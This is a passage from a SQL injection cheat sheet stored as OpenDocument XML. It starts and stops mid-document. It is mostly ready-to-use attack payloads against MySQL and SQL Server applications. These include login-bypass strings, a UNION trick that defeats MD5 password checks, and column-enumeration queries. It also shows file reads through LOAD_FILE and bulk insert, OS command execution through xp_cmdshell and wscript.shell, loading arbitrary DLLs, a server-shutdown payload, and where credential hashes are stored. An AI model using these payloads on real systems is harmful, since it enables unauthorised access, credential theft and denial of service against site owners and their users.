      <text:h text:style-name="Heading_20_5" text:outline-level="5" text:is-list-header="true"><text:bookmark text:name="SampleIfStatements"/>If Statement SQL Injection Attack Samples </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</text:span> (S)<text:line-break/>This will throw an <text:span text:style-name="Strong_20_Emphasis">divide by zero error</text:span> if current logged user is not <text:span text:style-name="Strong_20_Emphasis">"sa" or "dbo"</text:span>.</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="UsingIntegers"/>Using Integers </text:h>
      <text:p text:style-name="Text_20_body">Very useful for bypassing, <text:span text:style-name="Strong_20_Emphasis">magic_quotes() and similar filters</text:span>, or even WAFs. </text:p>
      <text:list text:style-name="L12">
        <text:list-item>
          <text:p text:style-name="P19"><text:span text:style-name="Source_20_Text">0x</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Emphasis">HEXNUMBER</text:span></text:span> (SM)<text:line-break/>You can  write hex like these;<text:line-break/><text:line-break/><text:span text:style-name="Source_20_Text">SELECT CHAR(0x66)</text:span> (S)<text:line-break/><text:span text:style-name="Source_20_Text">SELECT 0x5045</text:span> (<text:span text:style-name="Emphasis">this is not an integer it will be a string from Hex</text:span>) (M)<text:line-break/><text:span text:style-name="Source_20_Text">SELECT 0x50 + 0x45</text:span> (<text:span text:style-name="Emphasis">this is integer now!</text:span>) (M) </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="StringOperations"/>String  Operations </text:h>
      <text:p text:style-name="Text_20_body">String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.</text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="StringConcat"/>String Concatenation </text:h>
      <text:list text:style-name="L13">
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="Source_20_Text">+</text:span> (S)<text:line-break/><text:span text:style-name="Source_20_Text">SELECT login + '-' + password FROM members</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P20"><text:span text:style-name="Source_20_Text">||</text:span> (*MO)<text:line-break/><text:span text:style-name="Source_20_Text">SELECT login || '-' || password FROM members </text:span></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">*About MySQL "||";</text:span><text:line-break/>If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using <text:span text:style-name="Source_20_Text">CONCAT()</text:span> function in MySQL.</text:p>
      <text:list text:style-name="L14">
        <text:list-item>
          <text:p text:style-name="P21"><text:span text:style-name="Source_20_Text">CONCAT(str1, str2, str3, ...)</text:span> (M)<text:line-break/>Concatenate supplied strings. <text:line-break/><text:span text:style-name="Source_20_Text">SELECT CONCAT(login, password) FROM members</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="StringwithoutQuotes"/>Strings without Quotes </text:h>
      <text:p text:style-name="Text_20_body">These are some direct ways to using strings but it’s always possible to use <text:span text:style-name="Source_20_Text">CHAR()</text:span>(MS) and <text:span text:style-name="Source_20_Text">CONCAT()</text:span>(M) to generate string without quotes.</text:p>
      <text:list text:style-name="L15">
        <text:list-item>
          <text:p text:style-name="P22"><text:span text:style-name="Source_20_Text">0x457578</text:span> (M) - Hex Representation of string <text:line-break/><text:span text:style-name="Source_20_Text">SELECT 0x457578</text:span><text:line-break/>This will be selected as string in MySQL.<text:line-break/><text:line-break/>In MySQL easy way to generate hex representations of strings use this;<text:line-break/><text:span text:style-name="Source_20_Text">SELECT CONCAT('0x',HEX('c:\\boot.ini'))</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P22">Using <text:span text:style-name="Source_20_Text">CONCAT()</text:span> in MySQL<text:line-break/><text:span text:style-name="Source_20_Text">SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))</text:span> (M)<text:line-break/>This will return ‘KLM’.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P22"><text:span text:style-name="Source_20_Text">SELECT CHAR(75)+CHAR(76)+CHAR(77)</text:span> (S)<text:line-break/>This will return ‘KLM’. </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="HexbasedSamples"/>Hex based SQL Injection Samples</text:h>
      <text:list text:style-name="L16">
        <text:list-item>
          <text:p text:style-name="P23"><text:span text:style-name="Source_20_Text">SELECT LOAD_FILE(0x633A5C626F6F742E696E69)</text:span> (M) <text:line-break/>This will show the content of <text:span text:style-name="Strong_20_Emphasis">c:\boot.ini</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="StringModification"/>String Modification &amp; Related </text:h>
      <text:list text:style-name="L17">
        <text:list-item>
          <text:p text:style-name="P24"><text:span text:style-name="Source_20_Text">ASCII()</text:span> (SMP) <text:line-break/>Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.<text:line-break/><text:line-break/><text:span text:style-name="Source_20_Text">SELECT ASCII('a')</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P24"><text:span text:style-name="Source_20_Text">CHAR()</text:span> (SM) <text:line-break/>Convert an integer of ASCII.<text:line-break/><text:line-break/><text:span text:style-name="Source_20_Text">SELECT CHAR(64)</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2" text:is-list-header="true"><text:bookmark text:name="UnionInjections"/>Union Injections</text:h>
      <text:p text:style-name="Text_20_body">With union you do SQL queries cross-table. Basically you can poison query to return records from another table. </text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members </text:span><text:line-break/>This will combine results from both news table and members table and return all of them. </text:p>
      <text:p text:style-name="Text_20_body">Another Example : <text:line-break/><text:span text:style-name="Source_20_Text">' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</text:span></text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="UnionLanguageIssues"/>UNION – Fixing Language Issues</text:h>
      <text:p text:style-name="Text_20_body">While exploiting Union injections sometimes you get errors because of different language settings (<text:span text:style-name="Emphasis">table settings, field settings, combined table / db settings etc.</text:span>) these functions are quite useful to fix this problem. It's rare but if you dealing with <text:span text:style-name="Emphasis">Japanese, Russian, Turkish</text:span> etc. applications then you will see it. </text:p>
      <text:list text:style-name="L18">
        <text:list-item>
          <text:p text:style-name="P25">SQL Server (S) <text:line-break/>Use <text:span text:style-name="Source_20_Text">field</text:span> <text:span text:style-name="Strong_20_Emphasis"><text:span text:style-name="Source_20_Text">COLLATE</text:span></text:span><text:span text:style-name="Source_20_Text"> SQL_Latin1_General_Cp1254_CS_AS</text:span> or some other valid one - <text:span text:style-name="Emphasis">check out SQL Server documentation</text:span>.<text:line-break/><text:line-break/><text:span text:style-name="Source_20_Text">SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P25">MySQL (M) <text:line-break/><text:span text:style-name="Source_20_Text">Hex() </text:span>for every possible issue </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="ByPassingLoginScreens"/>Bypassing Login Screens (SMO+) </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Emphasis">SQL Injection 101</text:span>, Login tricks </text:p>
      <text:list text:style-name="L19">
        <text:list-item>
          <text:p text:style-name="P26"><text:span text:style-name="Source_20_Text">admin' -- </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:span text:style-name="Source_20_Text">admin' # </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:span text:style-name="Source_20_Text">admin'/*</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:span text:style-name="Source_20_Text">' or 1=1--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:span text:style-name="Source_20_Text">' or 1=1#</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:span text:style-name="Source_20_Text">' or 1=1/*</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:span text:style-name="Source_20_Text">') or '1'='1--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P26"><text:span text:style-name="Source_20_Text">') or ('1'='1--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P27">.... </text:p>
        </text:list-item>
      </text:list>
      <text:list text:style-name="L20">
        <text:list-item>
          <text:p text:style-name="P28">Login as different user (SM*) <text:line-break/><text:span text:style-name="Source_20_Text">' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Emphasis">*Old versions of MySQL doesn't support union queries </text:span></text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="UnionLanguageIssues2"/><text:bookmark text:name="UnionLanguageIssues1"/>Bypassing second MD5 hash check login screens </text:h>
      <text:p text:style-name="Text_20_body">If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. </text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="BypassingMD5Hash"/>Bypassing MD5 Hash Check Example (MSP) </text:h>
      <text:p text:style-name="Text_20_body">Username :<text:span text:style-name="Source_20_Text"> admin</text:span><text:line-break/>Password : <text:span text:style-name="Source_20_Text">1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</text:span></text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) </text:span></text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"> </text:h>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Error Based - Find Columns Names </text:h>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Finding Column Names with <text:span text:style-name="Strong_20_Emphasis">HAVING BY</text:span> - Error Based (S) </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Emphasis">In the same order, </text:span></text:p>
      <text:list text:style-name="L21">
        <text:list-item>
          <text:p text:style-name="P29">'<text:span text:style-name="Source_20_Text"> HAVING 1=1 -- </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P29"><text:span text:style-name="Source_20_Text">' GROUP BY </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">table.columnfromerror1</text:span></text:span><text:span text:style-name="Source_20_Text"> HAVING 1=1 -- </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P29"><text:span text:style-name="Source_20_Text">' GROUP BY </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">table.columnfromerror1, columnfromerror2</text:span></text:span><text:span text:style-name="Source_20_Text"> HAVING 1=1 --</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P29"><text:span text:style-name="Source_20_Text">' GROUP BY </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">table.columnfromerror1, columnfromerror2, columnfromerror(n) </text:span></text:span><text:span text:style-name="Source_20_Text">HAVING 1=1 --</text:span> <text:span text:style-name="Emphasis">and so on</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P30">If you are not getting any more error then it's done. </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Finding how many columns in SELECT query by <text:span text:style-name="Strong_20_Emphasis">ORDER BY</text:span> <text:span text:style-name="Strong_20_Emphasis">(MSO+)</text:span></text:h>
      <text:p text:style-name="Text_20_body">Finding column number by ORDER BY can speed up the UNION SQL Injection process.</text:p>
      <text:list text:style-name="L22">
        <text:list-item>
          <text:p text:style-name="P31"><text:span text:style-name="Source_20_Text">ORDER BY 1-- </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P31"><text:span text:style-name="Source_20_Text">ORDER BY 2--</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P31"><text:span text:style-name="Source_20_Text">ORDER BY N--</text:span> <text:span text:style-name="Emphasis">so on</text:span> </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P32">Keep going until get an error. Error means you found the number of selected columns. </text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Data types, UNION, etc. </text:h>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Hints,</text:h>
      <text:list text:style-name="L23">
        <text:list-item>
          <text:p text:style-name="P33">Always use <text:span text:style-name="Strong_20_Emphasis">UNION</text:span> with <text:span text:style-name="Strong_20_Emphasis">ALL </text:span>because of <text:span text:style-name="Strong_20_Emphasis">image</text:span> similiar non-distinct field types. By default union tries to get records with distinct. </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P33">To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (<text:span text:style-name="Emphasis">if injection is in WHERE</text:span>). This can be critical if you are only getting one result at a time. </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P33">Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc. </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P34">Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (<text:span text:style-name="Emphasis">because normally developers are not expecting to see NULL in a username field</text:span>) </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Finding Column Type </text:h>
      <text:list text:style-name="L24">
        <text:list-item>
          <text:p text:style-name="P35"><text:span text:style-name="Source_20_Text"> ' union select sum(</text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">columntofind</text:span></text:span><text:span text:style-name="Source_20_Text">) from </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">users</text:span></text:span><text:span text:style-name="Source_20_Text">--</text:span> (S) <text:line-break/><text:span text:style-name="Source_20_Text">Microsoft OLE DB Provider for ODBC Drivers error '80040e07' <text:line-break/>[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">varchar</text:span></text:span><text:span text:style-name="Source_20_Text"> data type as an argument.</text:span><text:line-break/><text:line-break/><text:span text:style-name="Emphasis">If you are not getting error it means </text:span>column is numeric. </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P36">Also you can use CAST() or CONVERT() </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P35"><text:span text:style-name="Source_20_Text">SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</text:span></text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P35"><text:span text:style-name="Source_20_Text">11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</text:span><text:line-break/>No Error - Syntax is right. MS SQL Server Used. Proceeding.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P35"><text:span text:style-name="Source_20_Text">11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</text:span><text:line-break/>No Error – First column is an integer.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P35"><text:span text:style-name="Source_20_Text">11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </text:span><text:line-break/>Error! – Second column is not an integer.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P35"><text:span text:style-name="Source_20_Text">11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-</text:span><text:line-break/>No Error – Second column is a string.</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P35"><text:span text:style-name="Source_20_Text">11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-</text:span><text:line-break/>Error! – Third column is not an integer. ...<text:line-break/><text:line-break/><text:span text:style-name="Source_20_Text">Microsoft OLE DB Provider for SQL Server error '80040e07' <text:line-break/>Explicit conversion from data type </text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">int</text:span></text:span><text:span text:style-name="Source_20_Text"> to image is not allowed.</text:span> </text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">You’ll get convert() errors before union target errors ! </text:span>So<text:span text:style-name="Strong_20_Emphasis"> </text:span>start with<text:span text:style-name="Strong_20_Emphasis"> </text:span>convert() then union</text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Simple Insert (MSO+) </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</text:span> </text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes</text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Strong_20_Emphasis">@@version</text:span> (MS) <text:line-break/>Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions. </text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)</text:span></text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true"><text:bookmark text:name="BulkInsert"/>Bulk Insert (S) </text:h>
      <text:p text:style-name="Text_20_body">Insert a file content to a table. If you don't know internal path of web application you can <text:span text:style-name="Strong_20_Emphasis">read IIS (</text:span><text:span text:style-name="Emphasis">IIS 6 only</text:span><text:span text:style-name="Strong_20_Emphasis">) metabase file </text:span>(<text:span text:style-name="Emphasis">%systemroot%\system32\inetsrv\MetaBase.xml</text:span>) and then search in it to identify application path. </text:p>
      <text:list text:style-name="L25">
        <text:list-item>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P37">Create table foo( line varchar(8000) ) </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P37">bulk insert foo from 'c:\inetpub\wwwroot\login.asp' </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P38"><text:span text:style-name="Emphasis">Drop temp table, and repeat for another file. </text:span></text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">BCP (S) </text:h>
      <text:p text:style-name="Text_20_body">Write text file. Login Credentials are required to use this function. <text:line-break/><text:span text:style-name="Source_20_Text">bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar </text:span></text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">VBS, WSH in SQL Server (S) </text:h>
      <text:p text:style-name="Text_20_body">You can use VBS, WSH scripting in SQL Server because of ActiveX support. </text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">declare @o int <text:line-break/>exec sp_oacreate 'wscript.shell', @o out <text:line-break/>exec sp_oamethod @o, 'run', NULL, 'notepad.exe' <text:line-break/></text:span><text:span text:style-name="Source_20_Text"><text:span text:style-name="Emphasis">Username:</text:span></text:span><text:span text:style-name="Source_20_Text"> '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --</text:span></text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Executing system commands, xp_cmdshell (S) </text:h>
      <text:p text:style-name="Text_20_body">Well known trick, By default it's disabled in <text:span text:style-name="Emphasis">SQL Server 2005. </text:span>You need to have admin access. </text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</text:span></text:p>
      <text:p text:style-name="Text_20_body">Simple ping check (<text:span text:style-name="Emphasis">configure your firewall or sniffer to identify request before launch it</text:span>), </text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">EXEC master.dbo.xp_cmdshell 'ping &lt;ip address&gt;'</text:span></text:p>
      <text:p text:style-name="Text_20_body">You can not read results directly from error or union or something else. </text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Some Special Tables in SQL Server (S) </text:h>
      <text:list text:style-name="L26">
        <text:list-item>
          <text:p text:style-name="P39">Error Messages <text:line-break/><text:span text:style-name="Source_20_Text">master..sysmessages </text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P39">Linked Servers<text:line-break/><text:span text:style-name="Source_20_Text">master..sysservers</text:span></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P39">Password (<text:span text:style-name="Emphasis">2000 and 20005 both can be crackable, they use very similar hashing algorithm </text:span>) <text:line-break/>SQL Server 2000:<text:span text:style-name="Source_20_Text"> masters..sysxlogins</text:span><text:line-break/>SQL Server 2005 : <text:span text:style-name="Source_20_Text">sys.sql_logins</text:span></text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">More Stored Procedures for SQL Server (S) </text:h>
      <text:list text:style-name="L27">
        <text:list-item>
          <text:p text:style-name="P40">Cmd Execute (<text:span text:style-name="Strong_20_Emphasis">xp_cmdshell</text:span>)<text:line-break/>exec master..xp_cmdshell 'dir' </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">Registry Stuff (<text:span text:style-name="Strong_20_Emphasis">xp_regread</text:span>)</text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P41">xp_regaddmultistring </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">xp_regdeletekey </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">xp_regdeletevalue </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">xp_regenumkeys </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">xp_regenumvalues </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">xp_regread </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">xp_regremovemultistring </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P40">xp_regwrite <text:line-break/>exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' <text:line-break/>exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities' </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">Managing Services (<text:span text:style-name="Strong_20_Emphasis">xp_servicecontrol</text:span>)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">Medias (<text:span text:style-name="Strong_20_Emphasis">xp_availablemedia</text:span>)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">ODBC Resources (<text:span text:style-name="Strong_20_Emphasis">xp_enumdsn</text:span>)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">Login mode (<text:span text:style-name="Strong_20_Emphasis">xp_loginconfig</text:span>)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">Creating Cab Files (<text:span text:style-name="Strong_20_Emphasis">xp_makecab</text:span>)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">Domain Enumeration (<text:span text:style-name="Strong_20_Emphasis">xp_ntsec_enumdomains</text:span>)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">Process Killing (<text:span text:style-name="Emphasis">need PID</text:span>) (<text:span text:style-name="Strong_20_Emphasis">xp_terminate_process</text:span>)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P41">Add new procedure (<text:span text:style-name="Emphasis">virtually you can execute whatever you want</text:span>)<text:line-break/>sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’<text:line-break/>exec xp_webserver </text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P40">Write text file to a UNC or an internal path (sp_makewebtask)</text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">MSSQL Bulk Notes </text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ </text:span></text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</text:span></text:p>
      <text:p text:style-name="Text_20_body">HOST_NAME()<text:line-break/>IS_MEMBER (Transact-SQL) <text:line-break/>IS_SRVROLEMEMBER (Transact-SQL) <text:line-break/>OPENDATASOURCE (Transact-SQL) </text:p>
      <text:p text:style-name="P42">INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"</text:p>
      <text:p text:style-name="Text_20_body">OPENROWSET (Transact-SQL)  - <text:a xlink:type="simple" xlink:href="http://msdn2.microsoft.com/en-us/library/ms190312.aspx">http://msdn2.microsoft.com/en-us/library/ms190312.aspx</text:a></text:p>
      <text:p text:style-name="Text_20_body">You can not use sub selects in SQL Server Insert queries.</text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">SQL Injection in LIMIT (M) or ORDER (MSO)</text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;</text:span></text:p>
      <text:p text:style-name="Text_20_body">If injection is in second <text:span text:style-name="Emphasis">limit</text:span> you can comment it out or use in your union injection </text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Shutdown SQL Server (S)</text:h>
      <text:p text:style-name="Text_20_body">When you really pissed off, <text:span text:style-name="Source_20_Text">';shutdown -- </text:span></text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true"><text:bookmark text:name="Enablecmdshell"/>Enabling xp_cmdshell in SQL Server 2005 </text:h>
      <text:p text:style-name="Text_20_body">By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.</text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">EXEC sp_configure 'show advanced options',1<text:line-break/>RECONFIGURE</text:span></text:p>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">EXEC sp_configure 'xp_cmdshell',1<text:line-break/>RECONFIGURE</text:span></text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Finding Database Structure in SQL Server (S) </text:h>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Getting User defined Tables</text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">SELECT name FROM sysobjects WHERE xtype = 'U'</text:span></text:p>
      <text:h text:style-name="Heading_20_4" text:outline-level="4" text:is-list-header="true">Getting Column Names</text:h>
      <text:p text:style-name="Text_20_body"><text:span text:style-name="Source_20_Text">SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')</text:span></text:p>
      <text:h text:style-name="Heading_20_3" text:outline-level="3" text:is-list-header="true">Moving records (S)</text:h>
      <text:list text:style-name="L28">
        <text:list-item>
          <text:p text:style-name="P43">Modify WHERE and use <text:span text:style-name="Source_20_Text"><text:span text:style-name="Strong_20_Emphasis">NOT IN</text:span></text:span> or <text:span text:style-name="Strong_20_Emphasis"><text:span text:style-name="Source_20_Text">NOT EXIST</text:span></text:span>,<text:line-break/><text:span text:style-name="Source_20_Text">... WHERE users NOT IN ('First User', 'Second User')</text:span><text:line-break/><text:span text:style-name="Source_20_Text">SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members)</text:span> <text:span text:style-name="Emphasis">-- very good one</text:span> </text:p>
        </text:list-item>
        <text:list-item>
